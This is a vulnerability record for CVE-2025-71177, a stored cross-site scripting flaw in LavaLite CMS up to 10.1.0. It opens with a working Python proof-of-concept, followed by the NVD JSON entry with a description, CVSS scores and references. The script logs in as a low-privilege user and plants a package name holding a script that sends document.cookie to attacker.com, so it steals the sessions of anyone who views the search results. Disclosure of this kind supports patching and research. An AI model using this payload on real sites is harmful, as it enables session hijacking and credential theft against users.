CVE-2025-71177

import requests import json # CVE-2025-71177 PoC - LavaLite CMS Stored XSS # Target: LavaLite CMS <= 10.1.0 # Vulnerability: Stored XSS in package creation and search functionality TARGET_URL = "http://target.com" # Replace with actual target URL LOGIN_URL = f"{TARGET_URL}/login" PACKAGE_CREATE_URL = f"{TARGET_URL}/admin/package/store" SEARCH_URL = f"{TARGET_URL}/admin/package/search" # Malicious XSS payload XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' def login(session, username, password): """Login to LavaLite CMS""" data = { 'email': username, 'password': password } response = session.post(LOGIN_URL, data=data) return response.status_code == 200 def create_malicious_package(session, name, description): """Create package with XSS payload in name/description fields""" data = { 'name': name, 'description': description, 'status': 'active' } response = session.post(PACKAGE_CREATE_URL, data=data) return response.status_code == 200 def search_packages(session, query): """Trigger XSS by searching for the malicious package""" params = {'q': query} response = session.get(SEARCH_URL, params=params) return response.text def main(): session = requests.Session() # Step 1: Login with low-privilege account if not login(session, '[email protected]', 'password123'): print("[-] Login failed") return print("[+] Logged in successfully") # Step 2: Create malicious package with XSS in name field if create_malicious_package(session, XSS_PAYLOAD, 'Description'): print("[+] Malicious package created") # Step 3: Any user searching for packages will trigger the XSS result = search_packages(session, '') print("[+] XSS payload stored and will be triggered on search") print("[+] Payload: " + XSS_PAYLOAD) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-71177", "sourceIdentifier": "[email protected]", "published": "2026-01-23T17:16:08.760", "lastModified": "2026-01-29T19:06:40.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim."}, {"lang": "es", "value": "Las versiones de LavaLite CMS hasta la 10.1.0 inclusive contienen una vulnerabilidad de cross-site scripting almacenado en la funcionalidad de creación y búsqueda de paquetes. Los usuarios autenticados pueden introducir HTML o JavaScript manipulado en los campos Nombre o Descripción del paquete, que se almacena y luego se renderiza sin una codificación de salida adecuada en los resultados de búsqueda de paquetes. Cuando otros usuarios ven los resultados de búsqueda que incluyen el paquete malicioso, el script inyectado se ejecuta en sus navegadores, lo que podría permitir el secuestro de sesión, el robo de credenciales y acciones no autorizadas en el contexto de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lavalite:lavalite:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.1.0", "matchCriteriaId": "0B3A665F-D2AC-4FC2-83D1-D51F6F5B2312"}]}]}], "references": [{"url": "https://github.com/LavaLite/cms/issues/420", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://lavalite.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/lavalite-cms-stored-xss-via-package-creation-and-search", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}